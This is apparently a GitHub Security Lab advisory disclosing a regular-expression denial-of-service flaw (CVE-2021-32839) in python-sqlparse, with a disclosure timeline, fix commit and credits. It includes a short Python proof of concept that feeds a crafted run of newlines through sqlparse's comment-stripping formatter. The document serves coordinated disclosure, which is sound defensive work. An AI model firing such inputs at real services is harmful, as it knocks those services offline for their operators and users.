Coordinated Disclosure Timeline
- 2021-08-31: Report sent to albrecht.andi@gmail.com
- 2021-09-06: Draft advisory created. Erik and Rasmus have been invited as collaborators.
- 2021-09-10: Bug is fixed in commit 8238a9e.
- 2021-09-10: Advisory (GHSA-p5w8-wqhj-9hhf) published.
Summary
python-sqlparse contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service).
Product
python-sqlparse
Tested Version
Details
ReDoS
ReDoS, or Regular Expression Denial of Service, is a vulnerability affecting inefficient regular expressions which can perform extremely badly when run on a crafted input string.
This vulnerability was found using a CodeQL query which identifies inefficient regular expressions.
Vulnerability
The vulnerable regular expression is here.
Please follow these steps to reproduce the issue:
- Install sqlparse: pip install sqlparse
- Run the below with python3:
import sqlparse
# A long run of newlines followed by a character that is neither a space nor the end of the input.
attack = '\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\t'
# Placing it inside a comment routes it through the comment-stripping formatter.
sql = 'select * from bar /* ' + attack + '*/'
res = sqlparse.format(sql, strip_comments=True)
print(res)
Impact
This issue may lead to a denial of service.
CVE
- CVE-2021-32839
Credit
This issue was discovered by GitHub team members @erik-krogh (Erik Krogh Kristensen) and @yoff (Rasmus Petersen).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-107 in any communication regarding this issue.